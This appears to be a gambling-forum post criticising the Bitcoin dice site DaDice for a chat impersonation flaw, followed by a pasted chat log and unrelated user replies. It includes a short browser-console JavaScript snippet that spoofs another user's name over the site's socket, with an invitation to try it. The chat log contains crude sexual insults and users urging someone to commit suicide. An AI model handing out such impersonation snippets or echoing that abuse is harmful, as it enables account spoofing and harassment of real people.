So Dadice was Hacked yesterday. Albeit a chat hack, but it turns out (according to what the dev guy said in chat) the hack was not just a unicode or otherwise, it was a direct change to server side variables that store usernames. This means it is like no other chat hack on other dice sites. On other sites it is basically a client side rendering issue - the server was not infiltrated. On DaDice the username was actually changed on the server via a very simple web socket parameter change.
Why is this significant. The moderators will tell you it was just a hack to the chat system and was not in anyway an issue to the security of the site. To me it is more than that. It is the site's controls over web sessions that are now in question. Why is it possible to change any details of a web session on the server? The server and only the server should be monitoring this and ensuring the username used to log in and the session cannot be changed. In this case, it demonstrates that this site could have some more serious vulnerabilities.
No longer does the statement "It's just a simple chat hack" make a difference. They have yet to fix it! If it was so simple, why did it take so long!
DenseCrab also complained he lost access to his account and logged in as CenseDrab due to this access issue. And he was also the first to be targeted in chat.
How was it done.. Well after inspecting the code, one thing is very obvious.
The site made it easy with the client telling the server who it was, and the server didn't have any checks of who it actually was.
A variable object that defined the user looked like this:
socket_handshake_gameplay_token = {
"token": "1111|1984798bc3ed82374f|11.11.11.11",
"user": {
"id": "1111",
"username": "username",
"cm": "false"
}
}
Change the username in the variable above and then log back in:
socket.emit("online", socket_handshake_gameplay_token)
You now have someone else's username. No server side checks or anything!
Because this actually changed server side variables, it is considered a serious issue. I have read through more of the code and found a few more instances of poor coding like this.
As for the lag on the site. It has so many DOM updates it is ridiculous. What this means is the browser is constantly updating elements on the page - even some that do not need to be updated. This in turn causes your browser to use a lot of CPU and memory because it is quite slow at updating the DOM. The other issue is, the socket.io is prefering to use ajax over websockets. Ajax long polling causes the browser to do a lot of work and is not really the way forward when running a site like a gambling site. DaDice should force websocket and only websocket. If you have a 2 year old browser then stiff, upgrade or don't use the site.
My recommendation is to steer clear of this one. It is clearly coded by opportunists and not bitcoin / web coder types. It is therefore probably suffering from many security risks.
If you do continue, It should be a good ride as hackers eventually work out a method to steal coins. Or maybe they already are and the owners are unaware... how many times have we seen this happen to new unsuspecting victims. Stick with the trusted and tested sites that have lasted over 2 years. You have lower risk at these sites.
If you want to try it. After loading the website, press F12. In the console paste the code below and press enter. You will get an input box in the top menu and you can change your name to any other user and chat using their name.
$('.header-inner').append('
');
var changeName = function(){
if ($('#newName').val()){
socket_handshake_gameplay_token.user.username=$('#newName').val();
socket.emit("online", socket_handshake_gameplay_token);
}
}
I took a snap shot of the entire chat from when it started as it is quite amusing but hard to follow as the attacker uses everyone's name.
DenseCrab:
i saw azreal without mod before it
Psychedelic:
told you what to do to solve this
DenseCrab:
a few minutes ago
Psychedelic:
first enable 2fa and then change your pass
DenseCrab:
ok, but i have to stroke my dick first
TIP:
DreamStage sent a tip of 0.00050000 BTC to DDBank
DenseCrab:
after licking a 10inch cock I always have to stroke mine.
Psychedellic:
Me too
Psychedelic:
fake Dense do us a favor and go fuck yourself.
Psychedelic:
lol
Psychedelic:
so someone found a way to change the chat name..
Psychedelic:
Dense you were not hacked..
Staff dadice_dev:
nobody is hacked. this is a small trick
Psychedellic:
you hear me.. go fuck yourself!
Psychedelic:
Psychedellic with 2 ll not me
Psychedellic:
Whats the trick?
Psychedelic:
changing your name obviously in chat
Psychedellic:
is your code shit?
Psychedelic:
not mine
saurav:
or he used dense.crab at the username
dadice_dev:
its crap code all right!
saurav:
something like that gmail trick
saurav:
whats happenening here man
DenseCrab:
no.. its all about butt magic
Psychedelic:
lol..
Psychedelic:
it's simple..
Psychedelic:
someone found a way to change his name in the chat
saurav:
Well we gathered that. but IT guy doesn't know how or he would have stopped it by now..
Staff dadice_dev:
No he has basically connected to sockets directly and emitting simple "chat" status, thinking he is very big smart ass
Laimu:
Hello
Laimu:
i read about the hacks
Staff dadice_dev:
nothing has been hacked so nothing to worry about regarding this clown
Staff dadice_dev:
It will be taken care of shortly
Laimu:
how much coin they take
dadice_dev:
Its a bit too easy
Psychedelic:
it's easy to stop..
dadice_dev:
can we do other things over this socket?
Staff dadice_dev:
oh boy he wishes
Mod Azrael:
Thank you Sid.
Staff dadice_dev:
yes... it will be stopped soon
dadice_dev:
oh look........ bitcoin!!!
Staff dadice_dev:
let me have my coffee first
Laimu:
ok better put out a statement on reddit and/or forum
Laimu:
get this situation contained nicely
Staff dadice_dev:
I am not really that worried about this troll / clown
Psychedelic:
haha enjoy dev
Laimu:
coo.. I hope you get your coin back
Laimu:
good idea
Laimu:
I hate it when people steal my coin.
Laimu:
is there a safe place to dice these days?
Mod Azrael:
No coin has been taken Laimu.
Laimu:
pocketrocketscas is proven
Laimu:
Not yet.. but this site is pretty poorly coded.
Mod cavetroll:
Laimu what are you on about?
Laimu:
Hurry up and fix it!!!
Staff dadice_dev:
There is nothing to hurry up about
Staff dadice_dev:
there is just a troll in chat.
Stichedupsmile:
Must be a pretty good poorly coded site if so many people go on it.
Stichedupsmile:
Logic is 10/10
Staff dadice_dev:
your acccounts are all secure
Stichedupsmile:
Ahh ok
dadice_dev:
don't panic its all undercontrol
dadice_dev:
We can't stop server side actions from happening and don't look at session controls.. but don't panic.
Stichedupsmile:
This kids obviously got nothing better to do ^
CenseDrab:
i got hacked
CenseDrab:
dev
CenseDrab:
im the real densecrab btw
dadice_dev:
Bord shitless
CenseDrab:
i cant login on it anymore
Psychedelic:
lol no you are not
DenseCrab:
Sorry DenseCrab.. try again
CenseDrab:
ah dev also hacked
DenseCrab:
Entire site hacked!
DenseCrab:
Run for the hills
Mod cavetroll:
Shut up you little pissant
CenseDrab:
child
Mod cavetroll:
Site has not been hacked this is just a pissy little child at work
DenseCrab:
indeed
Bazza:
I'm more of a bored executive.
Mod cavetroll:
Oh so you're confessing?
Bazza:
Someone has to steal all the bitcoin left in the open.. right?
Mod cavetroll:
If that's how you sort your borredom how sad is your life?
Bazza:
yeah
Bazza:
pretty sad... but funny how poorly coded this is
Mod cavetroll:
yeah what
CenseDrab:
Maybe you should just suicide sir "DenseCrab"
Zemzz:
Hello guys
cavetroll:
Yeah DenseCrab.. suicide
Zemzz:
Hi
Mod cavetroll:
Bazza that says far more about you than even you realise. pathetic sad and ppointless
Zemzz:
I want to play with cavetroll's balls
Mod cavetroll:
Hey Zemzz
Lewie:
Don't we all
Zemzz:
lol
Zemzz:
lighten up fellas
Zemzz:
I'm sure we have a laugh
Mod cavetroll:
surprises me that people with this mentality still exists
Psychedelic:
welcome to the internet
Psychedelic:
you have seen nothing
Zemzz:
Why, you need people to keep you honest
Do you understand how our referral system is working? 
Yesterday my roll was very fast, 1 sec per roll, but it has been 5-10 sec per roll since 20 hours ago, and I saw other guys complaint it in the chatting room, I think it's not my internet issue, must be cloudflare sucks again?? 
i would like to hear from that if he/she on forum, i missed that just 10 rolls away but great to see dadice achieved that milestone 
cheers for dadice 
